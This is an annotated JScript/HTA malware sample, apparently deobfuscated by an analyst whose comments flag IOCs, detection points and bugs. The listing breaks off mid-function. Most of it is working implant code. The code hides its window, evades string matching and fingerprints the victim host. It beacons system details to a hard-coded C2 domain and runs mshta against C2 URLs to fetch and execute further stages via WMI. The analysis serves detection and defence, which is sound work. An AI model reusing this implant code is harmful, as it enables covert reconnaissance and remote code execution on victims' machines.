|
// Window-hiding prologue for the mshta/HTA host: the HTA window is pushed
// mostly off-screen, shrunk to 10x15 px, blurred, and re-blurred on every
// focus event so the victim never sees or interacts with it.
// NOTE(review): these three calls sit outside any try/catch, so under a host
// without `window` (wscript/cscript) the script dies here with a ReferenceError
// before any of the WScript-specific branches further down are reached.
window.moveTo(-105, 300); |
|
window.blur(); |
|
window.resizeTo(10, 15); |
|
try { |
|
// Error handler that returns false. NOTE(review): under IE/HTA onerror
// semantics it is a *true* return that suppresses the default script-error
// dialog, so this handler may not actually hide errors -- confirm on the host.
window.onerror = function(sMsg, sUrl, sLine) { |
|
return false; |
|
} |
|
// Refuse keyboard focus whenever the hidden window receives it.
window.onfocus = function() { |
|
window.blur(); |
|
} |
|
// Handler installation is best-effort; failures are swallowed.
} catch (e) {} |
|
// Container for every helper and configuration value below (analyst-assigned name).
var mainFuncStruct = {}; |
|
|
|
// Reverses a string character by character (UTF-16 code units, not code points).
// Not referenced anywhere in the visible listing -- likely leftover or a decoy.
function reverseString(s) { |
|
return s.split("").reverse().join(""); |
|
} |
|
// COM objects and C2 configuration. ProgIDs are assembled from string fragments
// so that "Scripting.FileSystemObject" / "WScript.Shell" never appear literally
// (defeats naive static string matching; the runtime strings are unchanged).
mainFuncStruct.fileObj = new ActiveXObject("Scrip" + "ting.FileSystemOb" + "ject"); |
|
mainFuncStruct.shellObj = new ActiveXObject("WScrip" + "t.S" + "hell"); |
|
// C2 base URL (network IOC). Not referenced elsewhere in the visible listing;
// the HTTP helpers use `someCNCUrl` below.
mainFuncStruct.cncDomain = "http://crt.officecloud.top/st"; |
|
// Value redacted by the analyst; not referenced elsewhere in the visible listing.
mainFuncStruct.maybeToken = "REDACTED"; |
|
// Stage marker. "" here; the main dispatch (bottom of file) compares it to
// "prfx" to decide between the first-run beacon and the polling loop.
mainFuncStruct.emptyIfFirstRun = ""; |
|
// Per-victim C2 URL; the query parameter is presumably an implant/campaign
// identifier (value redacted). A job key and "&" are appended by getCncWithJobURL.
mainFuncStruct.someCNCUrl = "http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED"; |
|
// Kill-date in epoch milliseconds, parsed by CanHelp(). ~1e15 ms is tens of
// thousands of years out, so in practice there is no expiry.
mainFuncStruct.highNumber = "999999999999999"; |
|
// Delay-then-call helper. Not referenced anywhere in the visible listing.
// Under mshta it schedules `callback` via window.setTimeout; under any other
// host it busy-waits on Date for `ms` milliseconds and then calls synchronously.
mainFuncStruct.callbackAfterTimeout = function(ms, callback) { |
|
if (mainFuncStruct.isRunningInMshta()) { |
|
window.setTimeout(callback, ms); |
|
} else { |
|
var now = new Date().getTime(); |
|
// Spin-wait: burns CPU for the whole delay (no Sleep() available here).
while (new Date().getTime() < now + ms); |
|
callback(); |
|
} |
|
} |
|
// Self-termination, tried in escalating order: close the HTA window through
// every alias of close(), then WScript.Quit, then as a last resort look up the
// host process's PID through WMI and terminate it. Every step is wrapped so a
// failure falls through to the next.
mainFuncStruct.killSelf = function() { |
|
if (mainFuncStruct.isRunningInMshta()) { |
|
try { |
|
// Bracket access (`window["close"]`) keeps the literal `.close()` out of the text.
window["close"](); |
|
} catch (e) {} |
|
try { |
|
window.self["close"](); |
|
} catch (e) {} |
|
try { |
|
window.top["close"](); |
|
} catch (e) {} |
|
try { |
|
self["close"](); |
|
} catch (e) {} |
|
try { |
|
// Re-open the current window into itself before closing -- presumably to
// avoid the IE "close this window?" confirmation; confirm on the host.
window.open('', '_self', ''); |
|
window["close"](); |
|
} catch (e) {} |
|
} |
|
try { |
|
// Lowercase `quit`: COM dispatch name lookup is case-insensitive, so this
// presumably resolves to WScript.Quit under wscript/cscript; throws (and is
// swallowed) where WScript is not defined.
WScript.quit(); |
|
} catch (e) {} |
|
try { |
|
// Last resort: terminate own process via WMI. NOTE(review): see getOwnPID --
// the PID it returns may not actually be this script host's.
var pid = mainFuncStruct.funcStruct1.getOwnPID(); |
|
mainFuncStruct.funcStruct1.terminateProcessByPID(pid); |
|
} catch (e) {} |
|
} |
|
// Host detection heuristic: any host that exposes a global `window` (mshta /
// IE) is treated as "mshta"; wscript/cscript do not define it.
mainFuncStruct.isRunningInMshta = function() { |
|
return typeof(window) !== "undefined"; |
|
} |
|
// True when the WScript object exists (wscript.exe / cscript.exe host).
// Not referenced anywhere in the visible listing.
mainFuncStruct.checkIfWscriptDefined = function() { |
|
return typeof(WScript) !== "undefined"; |
|
} |
|
// Random GUID-looking token used only for temp file names (%TEMP%\<token>.log).
// Not an RFC 4122 GUID: Math.floor((1 + r) * 0x1235612) lies in
// [0x1235612, 0x246AC24), i.e. 7 hex digits, so after substring(1) each s4()
// yields 6 hex chars, not 4. Math.random is fine for this (non-security) use.
mainFuncStruct.maybeGenGUID = function() { |
|
try { |
|
function s4() { |
|
return Math.floor((1 + Math.random()) * 0x1235612).toString(16).substring(1); |
|
} |
|
return s4() + s4() + '-' + s4() + s4() + '-' + s4() + '-' + |
|
s4() + '-' + s4() + s4() + s4(); |
|
// Swallowed error -> returns undefined, which callers concatenate into a path as "undefined".
} catch (e) {} |
|
} |
|
// funcStruct4: host-fingerprinting helpers (analyst-assigned name).
mainFuncStruct.funcStruct4 = {}; |
|
// Runs `net1 session` to a temp log and returns true if it did NOT fall through
// to the `echo ofailur` branch. `net1 session` normally needs administrative
// rights, so a true result presumably marks an elevated context (the caller
// appends "*" to the beacon when this succeeds). Detection: `net1 session`
// spawned from mshta/wscript with output redirected into %TEMP%.
mainFuncStruct.funcStruct4.getSessions = function() { |
|
try { |
|
var res = mainFuncStruct.funcStruct3.runCmdToFile("(net1 session || echo ofailur)", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); |
|
if (res.indexOf("ofailur") == -1) { |
|
return true; |
|
} |
|
return false; |
|
} catch (e) { |
|
return false; |
|
} |
|
} |
|
// Reads ProductName and CurrentBuildNumber from HKLM and joins them with the
// literal separator "triplestar" (a useful string IOC in the beacon body).
// Returns "Unknown" if either registry read throws.
mainFuncStruct.funcStruct4.readOsVersion = function() { |
|
try { |
|
var osver = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName"); |
|
var osbuild = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber"); |
|
return osver + "triplestar" + osbuild; |
|
} catch (e) {} |
|
return "Unknown"; |
|
} |
|
// Reads the last domain controller name recorded by Group Policy processing
// (HKLM\...\Group Policy\History\DCName). Returns "Unknown" when the value is
// missing or empty -- i.e. the host is probably not domain-joined.
mainFuncStruct.funcStruct4.getDCName = function() { |
|
try { |
|
var DC = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName"); |
|
if (DC.length > 0) { |
|
return DC; |
|
} |
|
} catch (e) {} |
|
return "Unknown"; |
|
} |
|
// Reads the machine-wide PROCESSOR_ARCHITECTURE from the Session Manager
// environment key (not the process environment, which would report x86 inside
// a WOW64 host). Returns "Unknown" on failure.
mainFuncStruct.funcStruct4.getArch = function() { |
|
try { |
|
var arch = mainFuncStruct.shellObj.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE"); |
|
return arch; |
|
} catch (e) {} |
|
return "Unknown"; |
|
} |
|
// Captures the output of `cd` (the current directory of the spawned cmd) into
// the fixed file %TEMP%\truew.tmp and returns it. Despite the name it changes
// no directory. The fixed file name is a host IOC.
mainFuncStruct.funcStruct4.cdToTempFolder = function() { |
|
try { |
|
var truew = mainFuncStruct.funcStruct3.runCmdToFile("cd", "%TEMP%\\truew.tmp"); |
|
return truew; |
|
} catch (e) {} |
|
return ""; |
|
} |
|
// Parses `route PRINT -4` output: on the first line that contains two
// "0.0.0.0" fields it returns the 4th non-empty whitespace-separated field.
// In the IPv4 routing table that line is the default route
// (destination, mask, gateway, interface, metric), so the value returned is
// presumably the local interface address of the default route -- confirm.
// Returns "" if no such line is found or the command fails.
mainFuncStruct.funcStruct4.getRoutingInfo = function() { |
|
try { |
|
var routeprint4 = mainFuncStruct.funcStruct3.runCmdToFile("route PRINT -4", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); |
|
var res = routeprint4.split("\r\n"); |
|
for (var i = 0; i < res.length; i++) { |
|
// NOTE: `line`, `zerocount`, `itemcount`, `correctflag` are assigned without
// `var` and therefore become implicit globals.
line = res[i].split(" "); |
|
zerocount = 0; |
|
itemcount = 0; |
|
correctflag = false; |
|
for (var j = 0; j < line.length; j++) { |
|
// Empty strings come from runs of spaces; only non-empty tokens are counted.
if (line[j]) { |
|
itemcount += 1; |
|
if (itemcount == 4 && correctflag) { |
|
return line[j]; |
|
} |
|
} |
|
if (line[j] == "0.0.0.0") { |
|
zerocount += 1; |
|
if (zerocount == 2) { |
|
correctflag = true; |
|
} |
|
} |
|
} |
|
} |
|
} catch (e) {} |
|
return ""; |
|
} |
|
// Builds the first-run beacon body: DOMAIN\user[*] followed by computer name,
// OS version/build, DC name, architecture, cmd working directory, default-route
// address and two code-page values, all joined by the literal separator
// " n0body i know ". The body is sent over plain HTTP, so that separator is a
// practical network IOC. A trailing "*" on the user marks getSessions() success.
mainFuncStruct.funcStruct4.getComputerInfo = function() { |
|
var net = new ActiveXObject("WScript.Network"); |
|
var domain = ""; |
|
if (net.UserDomain.length != 0) { |
|
domain = net.UserDomain; |
|
} else { |
|
try { |
|
// Fallback: ask cmd for %userdomain% when WScript.Network reports none.
domain = mainFuncStruct.funcStruct3.runCmdToFile("echo %userdomain%", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); |
|
// `finally` runs even if the try threw, in which case `domain` is still "".
} catch (h) {} finally { |
|
domain = domain.split(" \r\n")[0]; |
|
} |
|
} |
|
var info = domain + "\\" + net.Username; |
|
if (mainFuncStruct.funcStruct4.getSessions()) |
|
info += "*"; |
|
info += " n0body i know " + net.ComputerName; |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.readOsVersion(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.getDCName(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.getArch(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.cdToTempFolder(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.getRoutingInfo(); |
|
// chcp / getSomeCodePageNum are defined further down; they exist by the time
// the main dispatch at the bottom of the file calls this function.
info += " n0body i know " + mainFuncStruct.funcStruct4.chcp(); |
|
info += " n0body i know " + mainFuncStruct.funcStruct4.getSomeCodePageNum(); |
|
return info; |
|
} |
|
// Hard-coded code page: always returns "1252" (both branches). Callers compare
// this to "936" to pick the certutil/base64 read path, so in this build that
// path is never taken for the code-page reason. Possibly templated per target.
mainFuncStruct.funcStruct4.chcp = function() { |
|
try { |
|
return "1252" |
|
} catch (e) { |
|
return "1252"; |
|
} |
|
} |
|
// Code page passed to `chcp` before every captured command (see runCmdToFile).
// Always returns "1252"; the "437" fallback in the catch is unreachable because
// a string literal return cannot throw.
mainFuncStruct.funcStruct4.getSomeCodePageNum = function() { |
|
try { |
|
return "1252" |
|
} catch (e) { |
|
return "437"; |
|
} |
|
} |
|
// funcStruct6 (first definition): C2 beaconing helpers.
// NOTE(review): line 654 of this listing assigns `mainFuncStruct.funcStruct6 = {}`
// a second time, which replaces this object and drops every method defined
// between here and there (sendDataToCNC, sendErrorDataToCNC, getCncWithJobURL,
// sendHTTPRequestEmpty, runMshtaFromCNC). As listed, the main dispatch would then
// fail on sendDataToCNC. Most likely the analyst's renaming merged two distinct
// obfuscated object names -- treat the name as a collision, not as sample behaviour.
mainFuncStruct.funcStruct6 = {}; |
|
// POSTs `data` (with optional extra `headers`) to the job URL for the current stage.
mainFuncStruct.funcStruct6.sendDataToCNC = function(data, headers) { |
|
return mainFuncStruct.funcStruct7.sendHTTPRequest(mainFuncStruct.funcStruct6.getCncWithJobURL(), data, headers); |
|
} |
|
// Reports a caught exception to the C2: JScript error number, name and
// description travel as custom HTTP request headers (errno/errname/errdesc),
// the message as the POST body. Header names are a network IOC. Failures are
// swallowed (note the inner `catch (e)` shadows the parameter).
mainFuncStruct.funcStruct6.sendErrorDataToCNC = function(e) { |
|
try { |
|
var headers = {}; |
|
headers["errno"] = (e.number) ? e.number : "-1"; |
|
headers["errname"] = (e.name) ? e.name : "Unknown"; |
|
headers["errdesc"] = (e.description) ? e.description : "Unknown"; |
|
return mainFuncStruct.funcStruct6.sendDataToCNC(e.message, headers); |
|
} catch (e) {} |
|
} |
|
// Builds the C2 URL for a job: someCNCUrl + jobkey + "&". With no argument the
// stage marker `emptyIfFirstRun` is used as the key. The job key comes straight
// from the server response in CanHelp() and is not validated or encoded here.
mainFuncStruct.funcStruct6.getCncWithJobURL = function(jobkey) { |
|
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : mainFuncStruct.emptyIfFirstRun; |
|
return mainFuncStruct.someCNCUrl + jobkey + "&"; |
|
} |
|
// Tasking poll: despite the "Empty" name this issues a POST with an empty body
// (funcStruct7.sendHTTPRequest) to the current job URL and returns the request
// object so the caller can read status/responseText.
mainFuncStruct.funcStruct6.sendHTTPRequestEmpty = function() { |
|
var url = mainFuncStruct.funcStruct6.getCncWithJobURL(); |
|
return mainFuncStruct.funcStruct7.sendHTTPRequest(url); |
|
} |
|
// Spawns `mshta <C2 job URL>` so the next stage is fetched and executed
// directly from the C2 by mshta.exe. With fork32Bit the binary is taken from
// getSystemFolder() (SysWOW64 when present, i.e. the 32-bit mshta on x64).
// Creation goes through WMI Win32_Process.Create first and falls back to
// WScript.Shell.Run hidden and non-blocking.
// Detection: mshta.exe with an http(s) URL argument, parented by WmiPrvSE
// or by the script host.
mainFuncStruct.funcStruct6.runMshtaFromCNC = function(jobkey, fork32Bit) { |
|
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false; |
|
// "stelsy" is a placeholder replaced by the URL below.
var cmd = "mshta stelsy"; |
|
if (fork32Bit) |
|
cmd = mainFuncStruct.funcStruct2.getSystemFolder() + cmd; |
|
cmd = cmd.replace("stelsy", mainFuncStruct.funcStruct6.getCncWithJobURL(jobkey)); |
|
try { |
|
mainFuncStruct.funcStruct6.createProcessReturnPID(cmd); |
|
} catch (e) { |
|
// 0 = hidden window, false = do not wait for the child.
mainFuncStruct.shellObj.Run(cmd, 0, false); |
|
} |
|
} |
|
// funcStruct7: raw HTTP transport (analyst-assigned name).
mainFuncStruct.funcStruct7 = {}; |
|
// Returns an HTTP client: Msxml2.ServerXMLHTTP.6.0 preferred, WinHttpRequest
// 5.1 as fallback. ProgIDs are split to hide the literal names. `~~[]`
// evaluates to 0; 0x7530 is 30000 ms. Both clients bypass the IE/WinINet cache
// and proxy-script layer, which is presumably why they were chosen over
// MSXML2.XMLHTTP -- confirm.
mainFuncStruct.funcStruct7.getHttpRequestObj = function() { |
|
var http = null; |
|
try { |
|
http = new ActiveXObject("Msxml2.ServerXMLH" + "TTP.6.0"); |
|
// All four timeouts (resolve, connect, send, receive) set to 0.
http.setTimeouts(~~[], ~~[], ~~[], ~~[]); |
|
} catch (e) { |
|
http = new ActiveXObject("WinHttp.WinHttpRe" + "quest.5.1"); |
|
// 30 s resolve/connect/send, 0 receive.
http.setTimeouts(0x7530, 0x7530, 0x7530, ~~[]); |
|
} |
|
return http; |
|
} |
|
// Applies `headers` (plain object) to the request; if none of them is a
// Content-Type (case-insensitive), forces "Content-Type: application/json".
// The `finally` marks Content-Type as present even when setRequestHeader threw.
// Note the body actually sent is plain text, not JSON, so this header is a
// mismatch worth keying on in proxy logs.
mainFuncStruct.funcStruct7.setRequestHTTPHeaders = function(http, headers) { |
|
var headers = (typeof(headers) !== "undefined") ? headers : {}; |
|
var content = false; |
|
for (var key in headers) { |
|
try { |
|
var value = headers[key]; |
|
http.setRequestHeader(key, value); |
|
} catch (h) {} finally { |
|
if (key.toUpperCase() == "CONTENT-TYPE") |
|
content = true; |
|
} |
|
} |
|
if (!content) |
|
// Split method name == setRequestHeader.
http["setR" + "eque" + "stH" + "eader"]("Content-Type", "application/json"); |
|
} |
|
// Synchronous HTTP POST of `data` (default "") to `url` with optional extra
// headers; returns the request object. No TLS (URLs above are http://), no
// certificate or response validation, no timeout handling beyond the client's.
mainFuncStruct.funcStruct7.sendHTTPRequest = function(url, data, headers) { |
|
var data = (typeof(data) !== "undefined") ? data : ""; |
|
var http = mainFuncStruct.funcStruct7.getHttpRequestObj(); |
|
// third argument false = synchronous
http.open("POST", url, false); |
|
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers); |
|
http.send(data); |
|
return http; |
|
} |
|
// Synchronous HTTP GET to `url` with optional headers; returns the request
// object. Method names are split ("op"+"en", "se"+"nd") to hide the literals.
// Not referenced in the visible listing (CanHelp uses the funcStruct6 wrapper,
// which POSTs).
mainFuncStruct.funcStruct7.sendHTTPRequestEmpty = function(url, headers) { |
|
var http = mainFuncStruct.funcStruct7.getHttpRequestObj(); |
|
http["op" + "en"]("GET", url, false); |
|
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers); |
|
http["se" + "nd"](); |
|
return http; |
|
} |
|
// funcStruct1: process enumeration / termination via WMI (analyst-assigned name).
mainFuncStruct.funcStruct1 = {}; |
|
// Tries to learn the script host's own PID indirectly: spawn `cmd /K hostname`
// through Win32_Process.Create, find that child in the process list, read its
// ParentProcessId, terminate the child, return the parent PID.
// NOTE(review): processes created through Win32_Process.Create are generally
// parented by the WMI provider host (WmiPrvSE.exe), not by the caller, so the
// PID returned here may be WmiPrvSE's rather than mshta/wscript's -- confirm
// before relying on killSelf's last-resort path. If the child is not found,
// `latestProc` stays null and the ParentProcessId read throws (callers catch).
// Detection: `cmd.exe /K hostname` with a WMI parent, short-lived.
mainFuncStruct.funcStruct1.getOwnPID = function() { |
|
var cmd = mainFuncStruct.funcStruct2.expandEnvStrings("%comspec% /K hostname"); |
|
var childPid = mainFuncStruct.funcStruct6.createProcessReturnPID(cmd); |
|
var pid = -1; |
|
var latestTime = 0; |
|
var latestProc = null; |
|
var processes = mainFuncStruct.funcStruct1.getProcessList(); |
|
var items = new Enumerator(processes); |
|
while (!items.atEnd()) { |
|
var proc = items.item(); |
|
try { |
|
if (proc.ProcessId == childPid) { |
|
latestProc = proc; |
|
break; |
|
} |
|
} catch (e) {} |
|
items.moveNext(); |
|
} |
|
pid = latestProc.ParentProcessId; |
|
// `/K` keeps the cmd child alive until it is explicitly terminated here.
latestProc.Terminate(); |
|
return pid; |
|
} |
|
// Walks Win32_Process and calls Terminate() on the first entry whose ProcessId
// equals `pid`; returns true on a kill, false if not found. Per-item errors
// (e.g. access denied on Terminate) are swallowed and the walk continues.
mainFuncStruct.funcStruct1.terminateProcessByPID = function(pid) { |
|
var processes = mainFuncStruct.funcStruct1.getProcessList(); |
|
var items = new Enumerator(processes); |
|
while (!items.atEnd()) { |
|
var proc = items.item(); |
|
try { |
|
if (proc.ProcessId == pid) { |
|
proc.Terminate(); |
|
return true; |
|
} |
|
} catch (e) {} |
|
items.moveNext(); |
|
} |
|
return false; |
|
} |
|
// Returns the full Win32_Process collection from the local root\cimv2
// namespace (impersonation level "impersonate"). Detection: WMI
// Win32_Process queries originating from a script host.
mainFuncStruct.funcStruct1.getProcessList = function() { |
|
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); |
|
var query = "Select * From Win32_Process"; |
|
return wmi.ExecQuery(query); |
|
} |
|
// funcStruct5: registry access through the WMI StdRegProv provider
// (analyst-assigned name). Writing the registry this way avoids
// WScript.Shell.RegWrite and shows up as WMI activity instead.
mainFuncStruct.funcStruct5 = {}; |
|
// hDefKey handle values used by StdRegProv.
mainFuncStruct.funcStruct5.HKEY_CLASSES_ROOT = 0x80000000; |
|
mainFuncStruct.funcStruct5.HKCU = 0x80000001; |
|
mainFuncStruct.funcStruct5.HKLM = 0x80000002; |
|
// Local value-type tags consumed only by setRegistryValue's dispatch below;
// these are NOT the Win32 REG_* type codes.
mainFuncStruct.funcStruct5.REG_STRING = 0; |
|
mainFuncStruct.funcStruct5.REG_BINARY = 1; |
|
mainFuncStruct.funcStruct5.REG_DWORD = 2; |
|
mainFuncStruct.funcStruct5.REG_QWORD = 3; |
|
// Returns a StdRegProv object for `computer` (default "." = local host). The
// remote form is supported by the moniker but no caller in this listing uses it.
mainFuncStruct.funcStruct5.getWmiRegistryObject = function(computer) { |
|
var computer = (typeof(computer) !== "undefined") ? computer : "."; |
|
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv"); |
|
return reg; |
|
} |
|
// Creates `path` under `hKey` (idempotent) and writes `key` = `value` using the
// StdRegProv setter selected by the local `valType` tag. Unknown tags write
// nothing. Errors propagate to the caller. The single caller in this listing
// writes an HKCU DWORD (see the main dispatch).
mainFuncStruct.funcStruct5.setRegistryValue = function(hKey, path, key, value, valType, computer) { |
|
var reg = mainFuncStruct.funcStruct5.getWmiRegistryObject(computer); |
|
reg.CreateKey(hKey, path); |
|
if (valType == mainFuncStruct.funcStruct5.REG_STRING) |
|
reg.SetStringValue(hKey, path, key, value); |
|
else if (valType == mainFuncStruct.funcStruct5.REG_DWORD) |
|
reg.SetDWORDValue(hKey, path, key, value); |
|
else if (valType == mainFuncStruct.funcStruct5.REG_QWORD) |
|
reg.SetQWORDValue(hKey, path, key, value); |
|
else if (valType == mainFuncStruct.funcStruct5.REG_BINARY) |
|
reg.SetBinaryValue(hKey, path, key, value); |
|
} |
|
// funcStruct6 (second definition): process creation via WMI.
// NOTE(review): this assignment replaces the funcStruct6 object created at
// line 368 and silently drops the C2 helpers attached to it (sendDataToCNC,
// sendErrorDataToCNC, getCncWithJobURL, sendHTTPRequestEmpty, runMshtaFromCNC).
// Most likely two distinct obfuscated names were merged during the analyst's
// renaming; in the original sample these were presumably separate objects.
mainFuncStruct.funcStruct6 = {}; |
|
// Starts `cmd` through Win32_Process.Create with a hidden, 1x1 window at (1,1)
// and returns the new ProcessId. CreateFlags 16777216 == 0x01000000 ==
// CREATE_BREAKAWAY_FROM_JOB, so the child escapes any job object the host
// runs under. Detection: WmiPrvSE.exe as parent of mshta.exe / cmd.exe.
mainFuncStruct.funcStruct6.createProcessReturnPID = function(cmd) { |
|
var SW_HIDE = 0; |
|
var pid = 0; |
|
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") |
|
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_(); |
|
si.ShowWindow = SW_HIDE; |
|
si.CreateFlags = 16777216; |
|
// Lowercase `ySize`: COM property lookup is case-insensitive, so this
// presumably still sets YSize -- confirm.
si.X = si.Y = si.XSize = si.ySize = 1; |
|
var w32proc = wmi.Get("Win32_Process"); |
|
var method = w32proc.Methods_.Item("Create"); |
|
var inParams = method.InParameters.SpawnInstance_(); |
|
inParams.CommandLine = cmd; |
|
// null = inherit the caller's current directory.
inParams.CurrentDirectory = null; |
|
inParams.ProcessStartupInformation = si; |
|
var outParams = w32proc.ExecMethod_("Create", inParams); |
|
// Note: outParams.ReturnValue (0 on success) is never checked.
return outParams.ProcessId; |
|
} |
|
// funcStruct3: shell command execution (analyst-assigned name).
mainFuncStruct.funcStruct3 = {}; |
|
// Runs `cmd` under a nested cmd.exe with stdout+stderr redirected to
// `stdOutPath`, waits, reads the file back, deletes it, and returns the text.
// The command is prefixed with `chcp <code page> &` so output is in a known
// code page. `%c^oms^pec%` is the caret-split form of %comspec%: the outer
// `cmd /c` does not expand the mangled name, caret removal restores it, and the
// inner cmd expands it -- presumably so "comspec" never appears literally in
// the Run() command line. Because chcp() always returns "1252", the
// readFileUntilSuccess2 branch is the one taken in this build.
// Detection: cmd.exe /q /c ... 1> %TEMP%\<hex>.log 2>&1 from a script host.
mainFuncStruct.funcStruct3.runCmdToFile = function(cmd, stdOutPath) { |
|
cmd = "chcp " + mainFuncStruct.funcStruct4.getSomeCodePageNum() + " & " + cmd; |
|
var c = "cmd /c %c^oms^pec%^ /q /c " + cmd + " 1> " + mainFuncStruct.funcStruct2.expandEnvStrings(stdOutPath); |
|
c += " 2>&1"; |
|
// 0 = hidden window, true = block until the command exits.
mainFuncStruct.shellObj.Run(c, 0, true); |
|
if (mainFuncStruct.funcStruct4.chcp() == "936") { |
|
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(stdOutPath); |
|
} else { |
|
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess2(stdOutPath); |
|
} |
|
mainFuncStruct.funcStruct2.shellDeleteFile(stdOutPath); |
|
return data; |
|
} |
|
// Runs `cmd` hidden via WScript.Shell.Run. `fork` (default true) means do not
// wait; callers pass false to use `ping 127.0.0.1 -n 2` as a ~1 s sleep.
// Note the wrapped command `c` (nested cmd /q /c form) is built but never used:
// Run() is called with the raw `cmd`. `5 - 5` is just 0 (hidden window style).
mainFuncStruct.funcStruct3.shellRunCommand = function(cmd, fork) { |
|
var fork = (typeof(fork) !== "undefined") ? fork : true; |
|
var c = "cmd /c %c^oms^pe^c% /q /c " + cmd; |
|
mainFuncStruct.shellObj.Run(cmd, 5 - 5, !fork); |
|
} |
|
// funcStruct2: filesystem helpers (analyst-assigned name).
mainFuncStruct.funcStruct2 = {}; |
|
// Expands %VAR% references in `path` using WScript.Shell.ExpandEnvironmentStrings.
mainFuncStruct.funcStruct2.expandEnvStrings = function(path) { |
|
return mainFuncStruct.shellObj.ExpandEnvironmentStrings(path); |
|
} |
|
// Returns "%WINDIR%\SysWOW64\" when that folder exists (64-bit Windows), else
// "%WINDIR%\System32\". Used by runMshtaFromCNC to pick the 32-bit mshta.exe
// on x64 hosts when the C2 replies with status 202 (see CanHelp).
mainFuncStruct.funcStruct2.getSystemFolder = function() { |
|
var base = mainFuncStruct.funcStruct2.expandEnvStrings("%WINDIR%"); |
|
var syswow64 = base + "\\SysWOW64\\"; |
|
if (mainFuncStruct.fileObj.FolderExists(syswow64)) |
|
return syswow64; |
|
return base + "\\System32\\"; |
|
} |
|
// Polls until `path` exists and is non-empty, then returns its full contents
// read as ASCII (OpenTextFile mode 1 = ForReading, format 0 = ASCII).
// Each miss sleeps ~1 s via `ping 127.0.0.1 -n 2` and gives up with "" after
// 180 misses (~3 min). A read error (e.g. file still locked by the writer)
// also sleeps and retries, but that path never increments `loopcount`, so a
// persistently unreadable file loops forever.
mainFuncStruct.funcStruct2.readFileUntilSuccess = function(path) { |
|
var loopcount = 0; |
|
while (true) { |
|
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) { |
|
try { |
|
var fd = mainFuncStruct.fileObj.OpenTextFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), 1, false, 0); |
|
var data = fd.ReadAll(); |
|
fd.Close(); |
|
return data; |
|
} catch (e) { |
|
// Sleep-via-ping; the string is split to hide "127.0.0.1".
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); |
|
continue; |
|
} |
|
} else { |
|
loopcount += 1; |
|
if (loopcount > 180) { |
|
return ""; |
|
} |
|
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); |
|
} |
|
} |
|
} |
|
// Variant of readFileUntilSuccess with two extra behaviours:
//  - `exists` (default false): if true and the file is missing, report a
//    "Status: NotExist" header to the C2 and return "" immediately.
//  - `certutil` (default false) or code page 936: instead of reading the file
//    directly, base64-encode it with `certutil -encode` into a fresh temp file
//    and read that (text-safe transport of arbitrary bytes), then delete it.
// Otherwise the file is read via OpenAsTextStream in one read(Size) call.
// Same 180-miss / ~3 min give-up as readFileUntilSuccess. Only the default
// path is exercised by the callers in this listing (chcp() is "1252" and no
// caller passes `exists` or `certutil`).
// Detection: certutil.exe -encode <%TEMP%\*.log> <%TEMP%\*.log> from a script host.
mainFuncStruct.funcStruct2.readFileUntilSuccess2 = function(path, exists, certutil) { |
|
var exists = (typeof(exists) !== "undefined") ? exists : false; |
|
var certutil = (typeof(certutil) !== "undefined") ? certutil : false; |
|
if (!mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && exists) { |
|
var headers = {}; |
|
headers["Sta" + "tus"] = "Not" + "Exist"; |
|
mainFuncStruct.funcStruct6.sendDataToCNC("", headers); |
|
return ""; |
|
} |
|
var loopcount = 0; |
|
while (true) { |
|
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) { |
|
if (mainFuncStruct.funcStruct4.chcp() == "936" || certutil) { |
|
var newout = "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".l" + "og"; |
|
// Non-blocking (default fork=true); the nested read below polls for the output.
mainFuncStruct.funcStruct3.shellRunCommand("certut" + "il -encode " + mainFuncStruct.funcStruct2.expandEnvStrings(path) + " " + newout); |
|
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(newout); |
|
mainFuncStruct.funcStruct2.shellDeleteFile(newout); |
|
} else { |
|
var fp = mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)); |
|
var fd = fp.OpenAsTextStream(); |
|
// Lowercase read/close: COM dispatch is case-insensitive, so these presumably
// resolve to Read/Close -- confirm. No try/catch here, unlike readFileUntilSuccess.
var data = fd.read(fp.Size); |
|
fd.close(); |
|
} |
|
return data; |
|
} else { |
|
loopcount += 1; |
|
